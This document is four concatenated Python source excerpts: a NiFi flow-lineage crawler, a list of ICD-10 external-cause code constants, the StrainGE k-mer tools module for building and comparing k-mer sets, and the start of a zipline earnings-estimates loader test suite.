NifiType.REMOTE_OUTPUT_PORT,
target_uris=rpg_component.get("targetUris"),
parent_rpg_id=rpg_component.get("id"),
comments=component.get("comments"),
status=component.get("status", {}).get("runStatus"),
)
logger.debug(f"Adding remote output port {component.get('id')}")
for component in contents.get("inputPorts", []):
if component.get("connected", False):
remote_ports[component.get("id")] = NifiComponent(
component.get("id"),
component.get("name"),
component.get("type"),
rpg_component.get("parentGroupId"),
NifiType.REMOTE_INPUT_PORT,
target_uris=rpg_component.get("targetUris"),
parent_rpg_id=rpg_component.get("id"),
comments=component.get("comments"),
status=component.get("status", {}).get("runStatus"),
)
logger.debug(f"Adding remote input port {component.get('id')}")
nifi_rpg = NifiRemoteProcessGroup(
rpg_component.get("id"),
rpg_component.get("name"),
component.get("parentGroupId"),
remote_ports,
)
logger.debug(f"Adding remote process group {rpg_component.get('id')}")
self.nifi_flow.components.update(remote_ports)
self.nifi_flow.remoteProcessGroups[nifi_rpg.id] = nifi_rpg
for pg in flow_dto.get("processGroups", []):
pg_response = self.session.get(
url=urljoin(self.config.site_url, PG_ENDPOINT) + pg.get("id")
)
if not pg_response.ok:
self.report_warning(
self.config.site_url,
"Failed to get process group flow " + pg.get("id"),
)
continue
pg_flow_dto = pg_response.json().get("processGroupFlow", {})
self.update_flow(pg_flow_dto)
def update_flow_keep_only_ingress_egress(self):
components_to_del: List[NifiComponent] = []
for component in self.nifi_flow.components.values():
if (
component.nifi_type is NifiType.PROCESSOR
and component.type
not in NifiProcessorProvenanceEventAnalyzer.KNOWN_INGRESS_EGRESS_PROCESORS.keys()
) or component.nifi_type not in [
NifiType.PROCESSOR,
NifiType.REMOTE_INPUT_PORT,
NifiType.REMOTE_OUTPUT_PORT,
]:
components_to_del.append(component)
incoming = list(
filter(lambda x: x[1] == component.id, self.nifi_flow.connections)
)
outgoing = list(
filter(lambda x: x[0] == component.id, self.nifi_flow.connections)
)
# Create new connections from incoming to outgoing
for i in incoming:
for j in outgoing:
self.nifi_flow.connections.append((i[0], j[1]))
# Remove older connections, as we already created
# new connections bypassing component to be deleted
for i in incoming:
self.nifi_flow.connections.remove(i)
for j in outgoing:
self.nifi_flow.connections.remove(j)
for c in components_to_del:
if c.nifi_type is NifiType.PROCESSOR and (
| |
"V77"
V77_0 = "V77.0"
V77_1 = "V77.1"
V77_2 = "V77.2"
V77_3 = "V77.3"
V77_4 = "V77.4"
V77_5 = "V77.5"
V77_6 = "V77.6"
V77_7 = "V77.7"
V77_9 = "V77.9"
V78 = "V78"
V78_0 = "V78.0"
V78_1 = "V78.1"
V78_2 = "V78.2"
V78_3 = "V78.3"
V78_4 = "V78.4"
V78_5 = "V78.5"
V78_6 = "V78.6"
V78_7 = "V78.7"
V78_9 = "V78.9"
V79 = "V79"
V79_0 = "V79.0"
V79_1 = "V79.1"
V79_2 = "V79.2"
V79_3 = "V79.3"
V79_4 = "V79.4"
V79_5 = "V79.5"
V79_6 = "V79.6"
V79_8 = "V79.8"
V79_9 = "V79.9"
V80_V89 = "V80-V89"
V80 = "V80"
V80_0 = "V80.0"
V80_1 = "V80.1"
V80_2 = "V80.2"
V80_3 = "V80.3"
V80_4 = "V80.4"
V80_5 = "V80.5"
V80_6 = "V80.6"
V80_7 = "V80.7"
V80_8 = "V80.8"
V80_9 = "V80.9"
V81 = "V81"
V81_0 = "V81.0"
V81_1 = "V81.1"
V81_2 = "V81.2"
V81_3 = "V81.3"
V81_4 = "V81.4"
V81_5 = "V81.5"
V81_6 = "V81.6"
V81_7 = "V81.7"
V81_8 = "V81.8"
V81_9 = "V81.9"
V82 = "V82"
V82_0 = "V82.0"
V82_1 = "V82.1"
V82_2 = "V82.2"
V82_3 = "V82.3"
V82_4 = "V82.4"
V82_5 = "V82.5"
V82_6 = "V82.6"
V82_7 = "V82.7"
V82_8 = "V82.8"
V82_9 = "V82.9"
V83 = "V83"
V83_0 = "V83.0"
V83_1 = "V83.1"
V83_2 = "V83.2"
V83_3 = "V83.3"
V83_4 = "V83.4"
V83_5 = "V83.5"
V83_6 = "V83.6"
V83_7 = "V83.7"
V83_9 = "V83.9"
V84 = "V84"
V84_0 = "V84.0"
V84_1 = "V84.1"
V84_2 = "V84.2"
V84_3 = "V84.3"
V84_4 = "V84.4"
V84_5 = "V84.5"
V84_6 = "V84.6"
V84_7 = "V84.7"
V84_9 = "V84.9"
V85 = "V85"
V85_0 = "V85.0"
V85_1 = "V85.1"
V85_2 = "V85.2"
V85_3 = "V85.3"
V85_4 = "V85.4"
V85_5 = "V85.5"
V85_6 = "V85.6"
V85_7 = "V85.7"
V85_9 = "V85.9"
V86 = "V86"
V86_0 = "V86.0"
V86_1 = "V86.1"
V86_2 = "V86.2"
V86_3 = "V86.3"
V86_4 = "V86.4"
V86_5 = "V86.5"
V86_6 = "V86.6"
V86_7 = "V86.7"
V86_9 = "V86.9"
V87 = "V87"
V87_0 = "V87.0"
V87_1 = "V87.1"
V87_2 = "V87.2"
V87_3 = "V87.3"
V87_4 = "V87.4"
V87_5 = "V87.5"
V87_6 = "V87.6"
V87_7 = "V87.7"
V87_8 = "V87.8"
V87_9 = "V87.9"
V88 = "V88"
V88_0 = "V88.0"
V88_1 = "V88.1"
V88_2 = "V88.2"
V88_3 = "V88.3"
V88_4 = "V88.4"
V88_5 = "V88.5"
V88_6 = "V88.6"
V88_7 = "V88.7"
V88_8 = "V88.8"
V88_9 = "V88.9"
V89 = "V89"
V89_0 = "V89.0"
V89_1 = "V89.1"
V89_2 = "V89.2"
V89_3 = "V89.3"
V89_9 = "V89.9"
V90_V94 = "V90-V94"
V90 = "V90"
V90_0 = "V90.0"
V90_1 = "V90.1"
V90_2 = "V90.2"
V90_3 = "V90.3"
V90_4 = "V90.4"
V90_5 = "V90.5"
V90_6 = "V90.6"
V90_7 = "V90.7"
V90_8 = "V90.8"
V90_9 = "V90.9"
V91 = "V91"
V91_0 = "V91.0"
V91_1 = "V91.1"
V91_2 = "V91.2"
V91_3 = "V91.3"
V91_4 = "V91.4"
V91_5 = "V91.5"
V91_6 = "V91.6"
V91_7 = "V91.7"
V91_8 = "V91.8"
V91_9 = "V91.9"
V92 = "V92"
V92_0 = "V92.0"
V92_1 = "V92.1"
V92_2 = "V92.2"
V92_3 = "V92.3"
V92_4 = "V92.4"
V92_5 = "V92.5"
V92_6 = "V92.6"
V92_7 = "V92.7"
V92_8 = "V92.8"
V92_9 = "V92.9"
V93 = "V93"
V93_0 = "V93.0"
V93_1 = "V93.1"
V93_2 = "V93.2"
V93_3 = "V93.3"
V93_4 = "V93.4"
V93_5 = "V93.5"
V93_6 = "V93.6"
V93_7 = "V93.7"
V93_8 = "V93.8"
V93_9 = "V93.9"
V94 = "V94"
V94_0 = "V94.0"
V94_1 = "V94.1"
V94_2 = "V94.2"
V94_3 = "V94.3"
V94_4 = "V94.4"
V94_5 = "V94.5"
V94_6 = "V94.6"
V94_7 = "V94.7"
V94_8 = "V94.8"
V94_9 = "V94.9"
V95_V97 = "V95-V97"
V95 = "V95"
V95_0 = "V95.0"
V95_1 = "V95.1"
V95_2 = "V95.2"
V95_3 = "V95.3"
V95_4 = "V95.4"
V95_8 = "V95.8"
V95_9 = "V95.9"
V96 = "V96"
V96_0 = "V96.0"
V96_1 = "V96.1"
V96_2 = "V96.2"
V96_8 = "V96.8"
V96_9 = "V96.9"
V97 = "V97"
V97_0 = "V97.0"
V97_1 = "V97.1"
V97_2 = "V97.2"
V97_3 = "V97.3"
V97_8 = "V97.8"
V98_V99 = "V98-V99"
V98 = "V98"
V99 = "V99"
W00_X59 = "W00-X59"
W00_W19 = "W00-W19"
W00 = "W00"
W01 = "W01"
W02 = "W02"
W03 = "W03"
W04 = "W04"
W05 = "W05"
W06 = "W06"
W07 = "W07"
W08 = "W08"
W09 = "W09"
W10 = "W10"
W11 = "W11"
W12 = "W12"
W13 = "W13"
W14 = "W14"
W15 = "W15"
W16 = "W16"
W17 = "W17"
W18 = "W18"
W19 = "W19"
W20_W49 = "W20-W49"
W20 = "W20"
W21 = "W21"
W22 = "W22"
W23 = "W23"
W24 = "W24"
W25 = "W25"
W26 = "W26"
W27 = "W27"
W28 = "W28"
W29 = "W29"
W30 = "W30"
W31 = "W31"
W32 = "W32"
W33 = "W33"
W34 = "W34"
W35 = "W35"
W36 = "W36"
W37 = "W37"
W38 = "W38"
W39 = "W39"
W40 = "W40"
W41 = "W41"
W42 = "W42"
W43 = "W43"
W44 = "W44"
W45 = "W45"
W46 = "W46"
W49 = "W49"
W50_W64 = "W50-W64"
W50 = "W50"
W51 = "W51"
W52 = "W52"
W53 = "W53"
W54 = "W54"
W55 = "W55"
W56 = "W56"
W57 = "W57"
W58 = "W58"
W59 = "W59"
W60 = "W60"
W64 = "W64"
W65_W74 = "W65-W74"
W65 = "W65"
W66 = "W66"
W67 = "W67"
W68 = "W68"
W69 = "W69"
W70 = "W70"
W73 = "W73"
W74 = "W74"
W75_W84 = "W75-W84"
W75 = "W75"
W76 = "W76"
W77 = "W77"
W78 = "W78"
W79 = "W79"
W80 = "W80"
W81 = "W81"
W83 = "W83"
W84 = "W84"
W85_W99 = "W85-W99"
W85 = "W85"
W86 = "W86"
W87 = "W87"
W88 = "W88"
W89 = "W89"
W90 = "W90"
W91 = "W91"
W92 = "W92"
W93 = "W93"
W94 = "W94"
W99 = "W99"
X00_X09 = "X00-X09"
X00 = "X00"
X01 = "X01"
X02 = "X02"
X03 = "X03"
X04 = "X04"
X05 = "X05"
X06 = "X06"
X08 = "X08"
X09 = "X09"
X10_X19 = "X10-X19"
X10 = "X10"
X11 = "X11"
X12 = "X12"
X13 = "X13"
X14 = "X14"
X15 = "X15"
X16 = "X16"
X17 = "X17"
X18 = "X18"
X19 = "X19"
X20_X29 = "X20-X29"
X20 = "X20"
X21 = "X21"
X22 = "X22"
X23 = "X23"
X24 = "X24"
X25 = "X25"
X26 = "X26"
X27 = "X27"
X28 = "X28"
X29 = "X29"
X30_X39 = "X30-X39"
X30 = "X30"
X31 = "X31"
X32 = "X32"
X33 = "X33"
X34 = "X34"
X34_0 = "X34.0"
X34_1 = "X34.1"
X34_8 = "X34.8"
X34_9 = "X34.9"
X35 = "X35"
X36 = "X36"
X37 = "X37"
X38 = "X38"
X39 = "X39"
X40_X49 = "X40-X49"
X40 = "X40"
X41 = "X41"
X42 = "X42"
X43 = "X43"
X44 = "X44"
X45 = "X45"
X46 = "X46"
X47 = "X47"
X48 = "X48"
X49 = "X49"
X50_X57 = "X50-X57"
X50 = "X50"
X51 = "X51"
X52 = "X52"
X53 = "X53"
X54 = "X54"
X57 = "X57"
X58_X59 = "X58-X59"
X58 = "X58"
X59 = "X59"
X59_0 = "X59.0"
X59_9 = "X59.9"
X60_X84 = "X60-X84"
X60 = "X60"
X61 = "X61"
X62 = "X62"
X63 = "X63"
X64 = "X64"
X65 = "X65"
X66 = "X66"
X67 = "X67"
X68 = "X68"
X69 = "X69"
X70 = "X70"
X71 = "X71"
X72 = "X72"
X73 = "X73"
X74 = "X74"
X75 = "X75"
X76 = "X76"
X77 = "X77"
X78 = "X78"
X79 = "X79"
X80 = "X80"
X81 = "X81"
X82 = "X82"
X83 = "X83"
X84 = "X84"
X85_Y09 = "X85-Y09"
X85 = "X85"
X86 = "X86"
X87 = "X87"
X88 = "X88"
X89 = "X89"
X90 = "X90"
X91 = "X91"
X92 = "X92"
X93 = "X93"
X94 = "X94"
X95 = "X95"
X96 = "X96"
X97 = "X97"
X98 = "X98"
X99 = "X99"
Y00 = "Y00"
Y01 = "Y01"
Y02 = "Y02"
Y03 = "Y03"
Y04 = "Y04"
Y05 = "Y05"
Y06 = "Y06"
Y06_0 = "Y06.0"
Y06_1 | |
<filename>src/strainge/kmertools.py
# Copyright (c) 2016-2019, Broad Institute, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name Broad Institute, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import os
import logging
import h5py
import pysam
import skbio
import numpy as np
import matplotlib.pyplot as plt
from strainge import kmerizer
from strainge.io.utils import open_compressed, read_fastq
logger = logging.getLogger(__name__)
DEFAULT_K = 23
DEFAULT_FINGERPRINT_FRACTION = 0.01
OLD_FINGERPRINT_FRACTION = 0.002
A = 0
C = 1
G = 2
T = 3
BASES = "ACGT"
def kmer_string(k, kmer):
seq = ''.join([BASES[(kmer >> (2 * k)) & 3] for k in range(k - 1, -1, -1)])
return seq
def iter_sequences_bam(bamfile):
"""Iterate over sequences in a BAM file. Only outputs the sequence, useful
for kmerizing."""
bam = pysam.AlignmentFile(bamfile, check_header=False, check_sq=False)
seq_iter = iter(bam.fetch(until_eof=True))
seq_iter = filter(lambda r: not r.is_qcfail, seq_iter)
yield from (seq.seq.encode('utf-8') for seq in seq_iter)
bam.close()
def iter_sequences_fasta(f):
"""Use scikit-bio to iterate over FASTA sequences."""
yield from (str(seq) for seq in skbio.io.read(f, "fasta"))
def iter_sequences_fastq(f):
"""Use Heng Li's fast FASTQ reader to iterate over reads"""
yield from (r[1] for r in read_fastq(f))
def open_seq_file(file_name):
"""
Iterate over sequences present in either a BAM file, FASTA file, or FASTQ
file.
Assumes fasta unless ".fastq" or ".fq" in the file name.
Parameters
----------
file_name : str
The file to open
Yields
------
str
Each sequence present in the given file
"""
components = file_name.split('.')
if "bam" in components:
yield from iter_sequences_bam(file_name)
else:
with open_compressed(file_name) as f:
if "fastq" in components or "fq" in components:
yield from iter_sequences_fastq(f)
else:
yield from iter_sequences_fasta(f)
def load_hdf5(file_path, thing, expect_k=None):
with h5py.File(file_path, 'r') as h5:
hdf5_type = h5.attrs['type']
if isinstance(hdf5_type, bytes):
hdf5_type = hdf5_type.decode()
if hdf5_type != "KmerSet":
raise ValueError("The HDF5 file is not a KmerSet, unexpected type:"
" '{}'".format(h5.attrs['type']))
k = h5.attrs['k']
if expect_k is not None and expect_k != k:
raise ValueError(f"The loaded kmerset has not the expected k-mer size! Expected: {expect_k}, actual: {k}")
return np.array(h5[thing])
def load_kmers(file_name, expect_k=None):
return load_hdf5(file_name, "kmers", expect_k)
def load_counts(file_name, expect_k=None):
return load_hdf5(file_name, "counts", expect_k)
def load_fingerprint(file_name, expect_k=None):
return load_hdf5(file_name, "fingerprint", expect_k)
def name_from_path(file_path):
return os.path.splitext(os.path.basename(file_path))[0]
def kmerset_from_hdf5(file_path):
if not file_path.endswith(".hdf5"):
file_path += ".hdf5"
with h5py.File(file_path, 'r') as h5:
hdf5_type = h5.attrs['type']
if isinstance(hdf5_type, bytes):
hdf5_type = hdf5_type.decode()
assert hdf5_type == "KmerSet", "Not a KmerSet file!"
kset = KmerSet(h5.attrs['k'])
if "fingerprint_fraction" in h5.attrs:
kset.fingerprint_fraction = h5.attrs["fingerprint_fraction"]
if "fingerprint" in h5:
kset.fingerprint = np.array(h5["fingerprint"])
if not kset.fingerprint_fraction:
kset.fingerprint_fraction = OLD_FINGERPRINT_FRACTION
if "fingerprint_counts" in h5:
kset.fingerprint_counts = np.array(h5["fingerprint_counts"])
if "kmers" in h5:
kset.kmers = np.array(h5["kmers"])
if "counts" in h5:
kset.counts = np.array(h5["counts"])
return kset
def kmerset_from_file(file_path, k=DEFAULT_K):
return kmerset_from_hdf5(file_path)
def similarity_score(kmers1, kmers2, scoring="jaccard"):
"""Compute Jaccard similarity index"""
# count of kmers in common
intersection = float(kmerizer.count_common(kmers1, kmers2))
if scoring == "jaccard":
# Use Jaccard similarity index
score = intersection / (kmers1.size + kmers2.size - intersection)
elif scoring == "minsize":
# Use intersection / min_size (proper subset scores 1.0)
score = intersection / min(kmers1.size, kmers2.size)
elif scoring == "meansize":
# Use mean size in denominator (used in Mash)
score = intersection / ((kmers1.size + kmers2.size) / 2)
elif scoring == "maxsize":
# Use intersection / max_size (proper subset scores min/max)
score = intersection / max(kmers1.size, kmers2.size)
elif scoring == "reference":
# Use intersection / size of reference (useful for comparing reads to
# assembled references)
score = intersection / kmers2.size
else:
assert scoring in (
"jaccard", "minsize", "maxsize", "meansize", "reference"), \
"unknown scoring method"
return score
def similarity_numerator_denominator(kmers1, kmers2, scoring="jaccard"):
"""Compute Jaccard similarity index"""
# count of kmers in common
intersection = float(kmerizer.count_common(kmers1, kmers2))
if scoring == "jaccard":
# Use Jaccard similarity index
denom = (kmers1.size + kmers2.size - intersection)
elif scoring == "minsize":
# Use intersection / min_size (proper subset scores 1.0)
denom = min(kmers1.size, kmers2.size)
elif scoring == "maxsize":
# Use intersection / max_size (proper subset scores min/max)
denom = max(kmers1.size, kmers2.size)
elif scoring == "reference":
# Use intersection / size of reference (useful for comparing reads to
# assembled references)
denom = kmers2.size
else:
assert scoring in ("jaccard", "minsize", "maxsize"), \
"unknown scoring method"
return intersection, denom
def build_kmer_count_matrix(kmersets):
"""Build a big matrix with kmer counts from a list of kmersets.
Each column will represent a single k-mer set and each row a k-mer. This
will effectively merge all kmersets to a single matrix.
Parameters
----------
kmersets : List[KmerSet]
List of `KmerSet` objects to build the matrix from.
Returns
-------
Tuple[List[kmer_t], array]
This function returns a tuple with two elements: the first element is
a list of k-mers, i.e. the labels for the rows of the matrix, and the
second element is the matrix itself.
"""
# Defer to our C++ extension
return kmerizer.build_kmer_count_matrix([
(kmerset.kmers, kmerset.counts) for kmerset in kmersets
])
class KmerSet(object):
"""
Holds array of kmers and their associated counts & stats.
"""
def __init__(self, k=DEFAULT_K):
self.k = k
# data arrays
self.kmers = None
self.counts = None
self.fingerprint = None
self.fingerprint_counts = None
self.fingerprint_fraction = None
self.singletons = None
# stats from kmerizing, if appropriate
self.n_seqs = 0
self.n_bases = 0
self.n_kmers = 0
def __eq__(self, other):
return (self.k == other.k
and np.array_equal(self.fingerprint, other.fingerprint)
and np.array_equal(self.kmers, other.kmers)
and np.array_equal(self.counts, other.counts))
def kmerize_file(self, file_name, batch_size=100000000, verbose=True,
limit=0, prune=0):
seq_file = open_seq_file(file_name)
batch = np.empty(batch_size, dtype=np.uint64)
n_seqs = 0
n_bases = 0
n_kmers = 0
pruned = False
for seq in seq_file:
n_seqs += 1
seq_length = len(seq)
n_bases += seq_length
if n_kmers + seq_length > batch_size:
self.process_batch(batch, n_seqs, n_bases, n_kmers, verbose)
if limit and self.n_kmers > limit:
break
if prune and self.singletons > prune:
self.prune_singletons(verbose)
pruned = True
n_seqs = 0
n_bases = 0
n_kmers = 0
n_kmers += kmerizer.kmerize_into_array(self.k, seq, batch, n_kmers)
if limit and self.n_kmers + n_kmers >= limit:
break
self.process_batch(batch, n_seqs, n_bases, n_kmers, verbose)
if pruned:
self.prune_singletons(verbose)
def kmerize_seq(self, seq):
kmers = kmerizer.kmerize(self.k, seq)
self.n_seqs += 1
self.n_bases += len(seq)
self.n_kmers = kmers.size
self.kmers, self.counts = np.unique(kmers, return_counts=True)
def process_batch(self, batch, nseqs, nbases, nkmers, verbose):
self.n_seqs += nseqs
self.n_bases += nbases
self.n_kmers += nkmers
new_kmers, new_counts = np.unique(batch[:nkmers], return_counts=True)
if self.kmers is None:
self.kmers = new_kmers
self.counts = new_counts
else:
self.kmers, self.counts = kmerizer.merge_counts(
self.kmers, self.counts, new_kmers, new_counts)
self.singletons = np.count_nonzero(self.counts == 1)
if verbose:
self.print_stats()
def prune_singletons(self, verbose=False):
keepers = self.counts > 1
self.kmers = self.kmers[keepers]
self.counts = self.counts[keepers]
logger.debug("Pruned singletons: %d distinct k-mers remain",
self.kmers.size)
def merge_kmerset(self, other):
"""Create new KmerSet by merging this with another"""
new_set = KmerSet(self.k)
new_set.kmers, new_set.counts = kmerizer.merge_counts(
self.kmers, self.counts, other.kmers, other.counts)
return new_set
def intersect(self, kmers):
"""
Compute intersection with given kmers
:param kmers: kmers to keep
:return: reduced version of self
"""
ix = kmerizer.intersect_ix(self.kmers, kmers)
self.counts = self.counts[ix]
self.kmers = self.kmers[ix]
return self
def exclude(self, kmers):
"""
Return this KmerSet with excluded kmers removed.
:param kmers: kmers to exclude
:return: reduced version of self
"""
new_kmers = kmerizer.diff(self.kmers, kmers)
ix = kmerizer.intersect_ix(self.kmers, new_kmers)
self.counts = | |
from datetime import timedelta
from functools import partial
import itertools
from parameterized import parameterized
import numpy as np
from numpy.testing import assert_array_equal, assert_almost_equal
import pandas as pd
from toolz import merge
from zipline.pipeline import SimplePipelineEngine, Pipeline, CustomFactor
from zipline.pipeline.common import (
EVENT_DATE_FIELD_NAME,
FISCAL_QUARTER_FIELD_NAME,
FISCAL_YEAR_FIELD_NAME,
SID_FIELD_NAME,
TS_FIELD_NAME,
)
from zipline.pipeline.data import DataSet
from zipline.pipeline.data import Column
from zipline.pipeline.domain import EquitySessionDomain
from zipline.pipeline.loaders.earnings_estimates import (
NextEarningsEstimatesLoader,
NextSplitAdjustedEarningsEstimatesLoader,
normalize_quarters,
PreviousEarningsEstimatesLoader,
PreviousSplitAdjustedEarningsEstimatesLoader,
split_normalized_quarters,
)
from zipline.testing.fixtures import (
WithAdjustmentReader,
WithTradingSessions,
ZiplineTestCase,
)
from zipline.testing.predicates import assert_equal
from zipline.testing.predicates import assert_frame_equal
from zipline.utils.numpy_utils import datetime64ns_dtype
from zipline.utils.numpy_utils import float64_dtype
import pytest
class Estimates(DataSet):
event_date = Column(dtype=datetime64ns_dtype)
fiscal_quarter = Column(dtype=float64_dtype)
fiscal_year = Column(dtype=float64_dtype)
estimate = Column(dtype=float64_dtype)
class MultipleColumnsEstimates(DataSet):
event_date = Column(dtype=datetime64ns_dtype)
fiscal_quarter = Column(dtype=float64_dtype)
fiscal_year = Column(dtype=float64_dtype)
estimate1 = Column(dtype=float64_dtype)
estimate2 = Column(dtype=float64_dtype)
def QuartersEstimates(announcements_out):
class QtrEstimates(Estimates):
num_announcements = announcements_out
name = Estimates
return QtrEstimates
def MultipleColumnsQuartersEstimates(announcements_out):
class QtrEstimates(MultipleColumnsEstimates):
num_announcements = announcements_out
name = Estimates
return QtrEstimates
def QuartersEstimatesNoNumQuartersAttr(num_qtr):
class QtrEstimates(Estimates):
name = Estimates
return QtrEstimates
def create_expected_df_for_factor_compute(start_date, sids, tuples, end_date):
"""
Given a list of tuples of new data we get for each sid on each critical
date (when information changes), create a DataFrame that fills that
data through a date range ending at `end_date`.
"""
df = pd.DataFrame(tuples, columns=[SID_FIELD_NAME, "estimate", "knowledge_date"])
df = df.pivot_table(
columns=SID_FIELD_NAME, values="estimate", index="knowledge_date", dropna=False
)
df = df.reindex(pd.date_range(start_date, end_date))
# Index name is lost during reindex.
df.index = df.index.rename("knowledge_date")
df["at_date"] = end_date.tz_localize("utc")
df = df.set_index(["at_date", df.index.tz_localize("utc")]).ffill()
new_sids = set(sids) - set(df.columns)
df = df.reindex(columns=df.columns.union(new_sids))
return df
class WithEstimates(WithTradingSessions, WithAdjustmentReader):
"""
ZiplineTestCase mixin providing cls.loader and cls.events as class
level fixtures.
Methods
-------
make_loader(events, columns) -> PipelineLoader
Method which returns the loader to be used throughout tests.
events : pd.DataFrame
The raw events to be used as input to the pipeline loader.
columns : dict[str -> str]
The dictionary mapping the names of BoundColumns to the
associated column name in the events DataFrame.
make_columns() -> dict[BoundColumn -> str]
Method which returns a dictionary of BoundColumns mapped to the
associated column names in the raw data.
"""
# Short window defined in order for test to run faster.
START_DATE = pd.Timestamp("2014-12-28", tz="utc")
END_DATE = pd.Timestamp("2015-02-04", tz="utc")
@classmethod
def make_loader(cls, events, columns):
raise NotImplementedError("make_loader")
@classmethod
def make_events(cls):
raise NotImplementedError("make_events")
@classmethod
def get_sids(cls):
return cls.events[SID_FIELD_NAME].unique()
@classmethod
def make_columns(cls):
return {
Estimates.event_date: "event_date",
Estimates.fiscal_quarter: "fiscal_quarter",
Estimates.fiscal_year: "fiscal_year",
Estimates.estimate: "estimate",
}
def make_engine(self, loader=None):
if loader is None:
loader = self.loader
return SimplePipelineEngine(
lambda x: loader,
self.asset_finder,
default_domain=EquitySessionDomain(
self.trading_days,
self.ASSET_FINDER_COUNTRY_CODE,
),
)
@classmethod
def init_class_fixtures(cls):
cls.events = cls.make_events()
cls.ASSET_FINDER_EQUITY_SIDS = cls.get_sids()
cls.ASSET_FINDER_EQUITY_SYMBOLS = [
"s" + str(n) for n in cls.ASSET_FINDER_EQUITY_SIDS
]
# We need to instantiate certain constants needed by supers of
# `WithEstimates` before we call their `init_class_fixtures`.
super(WithEstimates, cls).init_class_fixtures()
cls.columns = cls.make_columns()
# Some tests require `WithAdjustmentReader` to be set up by the time we
# make the loader.
cls.loader = cls.make_loader(
cls.events, {column.name: val for column, val in cls.columns.items()}
)
class WithOneDayPipeline(WithEstimates):
"""
ZiplineTestCase mixin providing cls.events as a class level fixture and
defining a test for all inheritors to use.
Attributes
----------
events : pd.DataFrame
A simple DataFrame with columns needed for estimates and a single sid
and no other data.
Tests
------
test_wrong_num_announcements_passed()
Tests that loading with an incorrect quarter number raises an error.
test_no_num_announcements_attr()
Tests that the loader throws an AssertionError if the dataset being
loaded has no `num_announcements` attribute.
"""
@classmethod
def make_columns(cls):
return {
MultipleColumnsEstimates.event_date: "event_date",
MultipleColumnsEstimates.fiscal_quarter: "fiscal_quarter",
MultipleColumnsEstimates.fiscal_year: "fiscal_year",
MultipleColumnsEstimates.estimate1: "estimate1",
MultipleColumnsEstimates.estimate2: "estimate2",
}
@classmethod
def make_events(cls):
return pd.DataFrame(
{
SID_FIELD_NAME: [0] * 2,
TS_FIELD_NAME: [pd.Timestamp("2015-01-01"), pd.Timestamp("2015-01-06")],
EVENT_DATE_FIELD_NAME: [
pd.Timestamp("2015-01-10"),
pd.Timestamp("2015-01-20"),
],
"estimate1": [1.0, 2.0],
"estimate2": [3.0, 4.0],
FISCAL_QUARTER_FIELD_NAME: [1, 2],
FISCAL_YEAR_FIELD_NAME: [2015, 2015],
}
)
@classmethod
def make_expected_out(cls):
raise NotImplementedError("make_expected_out")
@classmethod
def init_class_fixtures(cls):
super(WithOneDayPipeline, cls).init_class_fixtures()
cls.sid0 = cls.asset_finder.retrieve_asset(0)
cls.expected_out = cls.make_expected_out()
def test_load_one_day(self):
# We want to test multiple columns
dataset = MultipleColumnsQuartersEstimates(1)
engine = self.make_engine()
results = engine.run_pipeline(
Pipeline({c.name: c.latest for c in dataset.columns}),
start_date=pd.Timestamp("2015-01-15", tz="utc"),
end_date=pd.Timestamp("2015-01-15", tz="utc"),
)
assert_frame_equal(results.sort_index(1), self.expected_out.sort_index(1))
class PreviousWithOneDayPipeline(WithOneDayPipeline, ZiplineTestCase):
"""
Tests that previous quarter loader correctly breaks if an incorrect
number of quarters is passed.
"""
@classmethod
def make_loader(cls, events, columns):
return PreviousEarningsEstimatesLoader(events, columns)
@classmethod
def make_expected_out(cls):
return pd.DataFrame(
{
EVENT_DATE_FIELD_NAME: pd.Timestamp("2015-01-10"),
"estimate1": 1.0,
"estimate2": 3.0,
FISCAL_QUARTER_FIELD_NAME: 1.0,
FISCAL_YEAR_FIELD_NAME: 2015.0,
},
index=pd.MultiIndex.from_tuples(
((pd.Timestamp("2015-01-15", tz="utc"), cls.sid0),)
),
)
class NextWithOneDayPipeline(WithOneDayPipeline, ZiplineTestCase):
"""
Tests that next quarter loader correctly breaks if an incorrect
number of quarters is passed.
"""
@classmethod
def make_loader(cls, events, columns):
return NextEarningsEstimatesLoader(events, columns)
@classmethod
def make_expected_out(cls):
return pd.DataFrame(
{
EVENT_DATE_FIELD_NAME: pd.Timestamp("2015-01-20"),
"estimate1": 2.0,
"estimate2": 4.0,
FISCAL_QUARTER_FIELD_NAME: 2.0,
FISCAL_YEAR_FIELD_NAME: 2015.0,
},
index=pd.MultiIndex.from_tuples(
((pd.Timestamp("2015-01-15", tz="utc"), cls.sid0),)
),
)
dummy_df = pd.DataFrame(
{SID_FIELD_NAME: 0},
columns=[
SID_FIELD_NAME,
TS_FIELD_NAME,
EVENT_DATE_FIELD_NAME,
FISCAL_QUARTER_FIELD_NAME,
FISCAL_YEAR_FIELD_NAME,
"estimate",
],
index=[0],
)
class WithWrongLoaderDefinition(WithEstimates):
"""
ZiplineTestCase mixin providing cls.events as a class level fixture and
defining a test for all inheritors to use.
Attributes
----------
events : pd.DataFrame
A simple DataFrame with columns needed for estimates and a single sid
and no other data.
Tests
------
test_wrong_num_announcements_passed()
Tests that loading with an incorrect quarter number raises an error.
test_no_num_announcements_attr()
Tests that the loader throws an AssertionError if the dataset being
loaded has no `num_announcements` attribute.
"""
@classmethod
